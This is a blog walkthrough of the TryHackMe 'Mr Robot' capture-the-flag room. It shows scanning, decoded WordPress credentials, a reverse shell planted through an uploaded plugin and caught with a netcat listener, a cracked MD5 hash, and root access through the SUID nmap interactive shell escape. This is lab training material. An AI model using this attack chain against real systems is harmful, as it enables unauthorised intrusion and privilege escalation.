After the relative success of the previous room I completed on TryHackMe, it was time to try something slightly more challenging. I really enjoyed watching the show Mr. Robot last year, so when I saw a Mr Robot themed room of medium difficulty, I thought this was the perfect one to try.
The goal was simple, to find the 3 hidden keys on the machine. There was no mention of a user.txt or root.txt this time, but it was a safe assumption that at least one of the keys would require some form of privileged access to obtain.
As is becoming somewhat of a pattern, I began by running a port scan against the machine, to find out what services were running. The results showed that there wasn't much other than a web server running.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 16:06 CET Nmap scan report for 10.10.149.92 Host is up (0.041s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 443/tcp open https
Hidden Directory Searching
There's a webserver running, which I already knew since my gobuster command started searching for directories. It found quite a lot of interesting stuff, most notably a Wordpress instance.
┌──(gareth㉿SRF239-L)-[~/Desktop] └─$ gobuster dir -u http://10.10.149.92 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.149.92 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/01/04 16:09:56 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /0 (Status: 301) /admin (Status: 301) /atom (Status: 301) /audio (Status: 301) /blog (Status: 301) /css (Status: 301) /dashboard (Status: 302) /favicon.ico (Status: 200) /feed (Status: 301) /images (Status: 301) /image (Status: 301) /Image (Status: 301) /index.html (Status: 200) /index.php (Status: 301) /intro (Status: 200) /js (Status: 301) /license (Status: 200) /login (Status: 302) /page1 (Status: 301) /phpmyadmin (Status: 403) /readme (Status: 200) /rdf (Status: 301) /robots (Status: 200) /robots.txt (Status: 200) /rss (Status: 301) /rss2 (Status: 301) /sitemap (Status: 200) /sitemap.xml (Status: 200) /video (Status: 301) /wp-admin (Status: 301) /wp-content (Status: 301) /wp-includes (Status: 301) /wp-config (Status: 200) /wp-cron (Status: 200) /wp-links-opml (Status: 200) /wp-load (Status: 200) /wp-login (Status: 200) /wp-signup (Status: 302) =============================================================== 2021/01/04 16:18:37 Finished ===============================================================
Needless to say, I spent a bit of time manually navigating to these directories. Most of them didn't really contain anything. It was fun though to browse through the website and see the Mr. Robot related text and apps that appeared.
Finding the Keys
Key 1 of 3
Among the files found was a
robots.txt which is always interesting to take a look at, to see if there's anything specific the admin didn't want search engines to index.
As it happens, there was a file called
key-1-of-3.txt. Navigating to this file in the browser, led me to the first key.
Also listed in this
robots.txt file was another file, called
fsocity.dic (this was probably supposed to be fsociety.dic). I downloaded this file and opened it. It appeared to be a password list for something.
Key 2 of 3
After inspecting the
/license directory, I was presented with a message on the website which said:
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
Upon inspecting the source code for this page, I found what appeared to be a base64 string of some kind.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot] └─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d elliot:ER28-0652
With these credentials, I was able to login to the Admin panel of the Wordpress site located at http://10.10.149.92/wp-login.php.
I then used this access to upload a new WordPress plugin, which contained a reverse shell to my machine. I set up a listener with
netcat and proceeded to activate the plugin.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.8.145.210] from (UNKNOWN) [10.10.149.92] 33519 bash: cannot set terminal process group (1755): Inappropriate ioctl for device bash: no job control in this shell daemon@linux:/opt/bitnami/apps/wordpress/htdocs$
Success. Now to find the
key-2-of-3.txt file. A quick
find command to find the file and a
ls -la reveals that the file is owned by the
robot user. I was currently logged in as a user called
daemon so I needed to switch users somehow.
I changed directory to the
/home/robot directory and managed to find a file called
daemon@linux:/home/robot$ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
I put this hash into crackstation.net which immediately came back with the resultant password, which allowed me to switch to the robot user and get the 2nd key.
daemon@linux:/home/robot$ su robot Password: robot@linux:~$ cat key-2-of-3.txt <redacted> robot@linux:~$
Key 3 of 3
Now to find the final key. For this, I needed root permissions on the box. A quick scan for any binary files with the SUID bit set which I could exploit returned the following list. See if you can spot the one I exploited.
I ran the
nmap binary in interactive mode and then from there spawned a shell.
Since this binary was given permission to run as the root user, my shell was also running as root. This then allowed me to capture the 3rd and final key.
robot@linux:~$ nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh # cat /root/key-3-of-3.txt <redacted>
Stabilizing the Shell
After doing a few of these CTF rooms now I have gotten into the habit of using Python to stabilize my shell. The shell you get with
netcat does not come with many nice features, like the ability to clear the screen, or autocomplete. In order to stabilize the shell, I first check if python is installed by doing
python3 --version. If it is installed, I then do the following to spawn a more stable shell.
When I am finished with the room and I exit back out to my host machine, I type
reset and press return to set my own local shell back to its defaults.
A good mixture of expertise required to crack this one. A bit of hash cracking, a bit of web-based searching, some decoding, Wordpress "exploiting" and a bit of privilege escalation at the end taking advantage of SUID.
I enjoyed this box because of the theme and also because of its challenging nature. I hope I'm able to find and complete another medium box like it again soon.